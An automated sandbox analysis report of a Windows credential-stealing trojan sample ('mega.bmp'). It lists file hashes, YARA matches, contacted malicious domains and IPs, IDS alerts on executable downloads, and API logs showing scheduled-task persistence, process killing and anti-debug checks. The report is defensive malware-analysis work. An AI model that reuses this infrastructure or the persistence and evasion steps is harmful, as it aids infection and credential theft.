popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

mega.bmp

Trojan_PWS_Stealer Gen1 AgentTesla Emotet Generic Malware Credential info stealer User Data browser UPX Chrome Malicious Library Malicious Packer Google SQLite Cookie Create Service DGA Socket DNS PWS Sniff Audio BitCoin
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 7, 2021, 4:39 p.m. Oct. 7, 2021, 4:41 p.m.
Size 385.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 477b1b2a2779f1a1d6e7ff42a5eb9772
SHA256 aa4efc2c7b8e21dc0ad4f2557f81768b4cf7fc05f7a0a65b22776c4e4e12454f
CRC32 0946F99C
ssdeep 12288:0ZK3R+sfOwtpl5othMsUmE0IKuPK6B3OXF/Bi:0Q3Rppl5ahe0qB3OZk
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library

Name Response Post-Analysis Lookup
www.iyiqian.com
A 103.155.92.58
103.155.92.58
www.listincode.com
A 144.202.76.47
144.202.76.47
telegram.org
A 149.154.167.99
149.154.167.99
iplogger.org
A 88.99.66.31
88.99.66.31
dc-repository.com
A 104.21.17.129
A 172.67.176.198
172.67.176.198
yandex.ru
A 77.88.55.66
A 77.88.55.60
A 5.255.255.60
A 5.255.255.70
77.88.55.60
publishersharef.s3.eu-north-1.amazonaws.com
CNAME s3-r-w.eu-north-1.amazonaws.com
A 52.95.170.52
52.95.171.32
twitter.com
A 104.244.42.1
104.244.42.129
www.nqhobby.com
A 103.155.93.196
103.155.93.196
ipinfo.io
A 34.117.59.81
34.117.59.81
connectini.net
A 162.0.210.44
162.0.210.44
futurepreneurs.eu
A 92.61.46.213
92.61.46.213
iplis.ru
A 88.99.66.31
88.99.66.31
install-cb.ru
A 37.140.192.230
37.140.192.230
www.cjnovone.top
A 188.225.87.175
188.225.87.175
apps.identrust.com
A 52.216.26.67
CNAME apps.identrust.com.s3-website-us-east-1.amazonaws.com
CNAME s3-website.us-east-1.amazonaws.com
52.217.90.163
threesmallhills.com
A 94.142.140.35
94.142.140.35
ukcom.pw
A 111.90.146.149
111.90.146.149
cdn.discordapp.com
A 162.159.135.233
A 162.159.134.233
A 162.159.129.233
A 162.159.130.233
A 162.159.133.233
162.159.129.233
safialinks.com
A 162.0.214.42
162.0.214.42
IP Address Status Action
103.155.92.58 Active Moloch
103.155.93.196 Active Moloch
104.244.42.1 Active Moloch
111.90.146.149 Active Moloch
144.202.76.47 Active Moloch
149.154.167.99 Active Moloch
162.0.210.44 Active Moloch
162.0.214.42 Active Moloch
162.159.135.233 Active Moloch
164.124.101.2 Active Moloch
172.67.176.198 Active Moloch
186.2.171.3 Active Moloch
188.225.87.175 Active Moloch
194.145.227.159 Active Moloch
2.56.59.42 Active Moloch
34.117.59.81 Active Moloch
37.0.8.119 Active Moloch
37.140.192.230 Active Moloch
45.133.1.107 Active Moloch
45.133.1.182 Active Moloch
52.216.26.67 Active Moloch
52.95.170.52 Active Moloch
77.88.55.60 Active Moloch
88.99.66.31 Active Moloch
92.61.46.213 Active Moloch
94.142.140.35 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 149.154.167.99:443 -> 192.168.56.101:49199 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 77.88.55.60:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49198 -> 149.154.167.99:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49202 -> 104.244.42.1:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49211 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49209 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49209 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49208 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49208 -> 34.117.59.81:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49210 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 34.117.59.81:443 -> 192.168.56.101:49208 2025330 ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49210 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49213 -> 162.159.135.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49219 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49219 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49223 -> 162.159.135.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49237 -> 162.159.135.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49234 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49238 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49238 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49235 -> 172.67.176.198:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49235 -> 172.67.176.198:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49243 -> 172.67.176.198:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 172.67.176.198:80 -> 192.168.56.101:49243 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49220 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49220 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49242 -> 94.142.140.35:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 45.133.1.107:80 -> 192.168.56.101:49226 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.133.1.107:80 -> 192.168.56.101:49226 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49259 -> 92.61.46.213:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49259 -> 92.61.46.213:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49245 -> 172.67.176.198:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49250 -> 172.67.176.198:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49262 -> 92.61.46.213:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49221 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49225 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49231 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49231 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49225 -> 34.117.59.81:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.117.59.81:443 -> 192.168.56.101:49225 2025330 ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49233 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49233 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.101:62902 -> 164.124.101.2:53 2016778 ET DNS Query to a *.pw domain - Likely Hostile Potentially Bad Traffic
TCP 192.168.56.101:49239 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49232 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49232 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49241 -> 162.159.135.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49268 -> 92.61.46.213:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49246 -> 111.90.146.149:80 2022896 ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 A Network Trojan was detected
TCP 192.168.56.101:49246 -> 111.90.146.149:80 2016777 ET INFO HTTP Request to a *.pw domain Potentially Bad Traffic
TCP 192.168.56.101:49246 -> 111.90.146.149:80 2022896 ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 A Network Trojan was detected
TCP 192.168.56.101:49246 -> 111.90.146.149:80 2016777 ET INFO HTTP Request to a *.pw domain Potentially Bad Traffic
TCP 192.168.56.101:49254 -> 92.61.46.213:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49254 -> 92.61.46.213:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 111.90.146.149:80 -> 192.168.56.101:49246 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 103.155.93.196:80 -> 192.168.56.101:49244 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49253 -> 94.142.140.35:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 94.142.140.35:80 -> 192.168.56.101:49253 2014819 ET INFO Packed Executable Download Misc activity
TCP 94.142.140.35:80 -> 192.168.56.101:49253 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49280 -> 144.202.76.47:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 194.145.227.159:80 -> 192.168.56.101:49230 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 194.145.227.159:80 -> 192.168.56.101:49230 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 194.145.227.159:80 -> 192.168.56.101:49230 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 37.140.192.230:80 -> 192.168.56.101:49249 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49286 -> 88.99.66.31:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49248 -> 52.95.170.52:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49272 -> 92.61.46.213:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 92.61.46.213:443 -> 192.168.56.101:49273 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
UDP 192.168.56.101:55667 -> 164.124.101.2:53 2023883 ET DNS Query to a *.top domain - Likely Hostile Potentially Bad Traffic
TCP 192.168.56.101:49311 -> 52.95.170.52:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49315 -> 188.225.87.175:80 2023882 ET INFO HTTP Request to a *.top domain Potentially Bad Traffic
TCP 192.168.56.101:49356 -> 52.95.170.52:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 162.0.214.42:80 -> 192.168.56.101:49359 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49363 -> 88.99.66.31:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49361 -> 162.0.210.44:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 162.0.214.42:80 -> 192.168.56.101:49365 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 162.0.214.42:80 -> 192.168.56.101:49365 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 162.0.214.42:80 -> 192.168.56.101:49365 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49204
77.88.55.60:443 		C=RU, O=Yandex LLC, OU=Yandex Certification Authority, CN=Yandex CA C=RU, L=Moscow, OU=ITO, O=Yandex LLC, CN=*.yandex.az 2b:13:52:0c:b0:c6:8c:c9:e3:05:6e:11:91:74:4d:65:ce:3a:64:29
TLSv1
192.168.56.101:49208
34.117.59.81:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1D4 CN=ipinfo.io 9b:8a:7e:73:93:70:47:e8:1f:ef:b1:b9:f4:52:8b:2f:90:2c:85:2e
TLSv1
192.168.56.101:49213
162.159.135.233:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1
192.168.56.101:49223
162.159.135.233:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1
192.168.56.101:49237
162.159.135.233:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1
192.168.56.101:49250
172.67.176.198:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com f2:26:d9:07:c7:f6:18:ff:8c:b8:6c:92:e9:50:57:e4:a9:94:e5:0d
TLSv1
192.168.56.101:49225
34.117.59.81:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1D4 CN=ipinfo.io 9b:8a:7e:73:93:70:47:e8:1f:ef:b1:b9:f4:52:8b:2f:90:2c:85:2e
TLSv1
192.168.56.101:49241
162.159.135.233:443 		None None None
TLSv1
192.168.56.101:49280
144.202.76.47:443 		C=CN, O=TrustAsia Technologies, Inc., OU=Domain Validated SSL, CN=TrustAsia TLS RSA CA CN=listincode.com 84:23:95:42:66:09:11:39:0d:e6:22:7f:eb:b3:cc:79:dd:fa:36:ed
TLSv1
192.168.56.101:49286
88.99.66.31:443 		C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA CN=*.iplogger.org 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb
TLSv1
192.168.56.101:49356
52.95.170.52:443 		C=US, O=Amazon, OU=Server CA 1B, CN=Amazon CN=*.s3.eu-north-1.amazonaws.com b3:55:b1:8b:e1:54:cd:a4:5a:94:dc:0f:a1:9a:da:9d:74:3e:22:d7
TLSv1
192.168.56.101:49361
162.0.210.44:443 		C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com 68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf
TLSv1
192.168.56.101:49363
88.99.66.31:443 		C=US, O=Let's Encrypt, CN=R3 CN=iplogger.com 01:03:e9:82:3a:f4:6d:5a:7f:e9:29:26:08:3c:f4:61:a7:b2:88:bb

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "PowerControl HR" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "PowerControl LG" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: SUCCESS!
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\RarSFX0>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: taskkill
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /f -Im "L_0PQ1nH1s1hf_DH8W5V8AUl.exe"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: SUCCESS: The process "L_0PQ1nH1s1hf_DH8W5V8AUl.exe" with PID 2744 has been terminated.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The file cannot be copied onto itself.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 0 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: XAJ5SctM.IMN
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: E1N4OJ2.aUX
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: KPeo.Pvp
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: _OTV19C.~
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: EcF9W5.VNQ
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: pm9uz.pF
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: KO6pQ1.bhw
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR: The process "chrome.exe" not found.
console_handle: 0x0000000b
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
file C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\Locales\ko.pak
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb1290
0x3bb15cd
0x3bc8929
0x3bf9194
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12051012
registers.edi: 0
registers.eax: 0
registers.ebp: 12051052
registers.edx: 32
registers.ebx: 12051356
registers.esi: 0
registers.ecx: 3690184
1 0 0

__exception__

 stacktrace: 
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb129e
0x3bb15cd
0x3bc8929
0x3bf9194
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12051012
registers.edi: 0
registers.eax: 0
registers.ebp: 12051052
registers.edx: 32
registers.ebx: 12051356
registers.esi: 0
registers.ecx: 3690184
1 0 0

__exception__

 stacktrace: 
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb1290
0x3bb15cd
0x3bc8929
0x3bc9811
0x3bf1d05
0x3bf29dd
0x3bf936b
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12045268
registers.edi: 0
registers.eax: 0
registers.ebp: 12045308
registers.edx: 32
registers.ebx: 12045612
registers.esi: 0
registers.ecx: 3690024
1 0 0

__exception__

 stacktrace: 
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb129e
0x3bb15cd
0x3bc8929
0x3bc9811
0x3bf1d05
0x3bf29dd
0x3bf936b
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12045268
registers.edi: 0
registers.eax: 0
registers.ebp: 12045308
registers.edx: 32
registers.ebx: 12045612
registers.esi: 0
registers.ecx: 3690024
1 0 0

__exception__

 stacktrace: 
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb1290
0x3bb15cd
0x3bc8929
0x3bc9075
0x3bf2b4f
0x3bf936b
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12045684
registers.edi: 0
registers.eax: 0
registers.ebp: 12045724
registers.edx: 32
registers.ebx: 12046028
registers.esi: 0
registers.ecx: 3273616
1 0 0

__exception__

 stacktrace: 
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb129e
0x3bb15cd
0x3bc8929
0x3bc9075
0x3bf2b4f
0x3bf936b
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
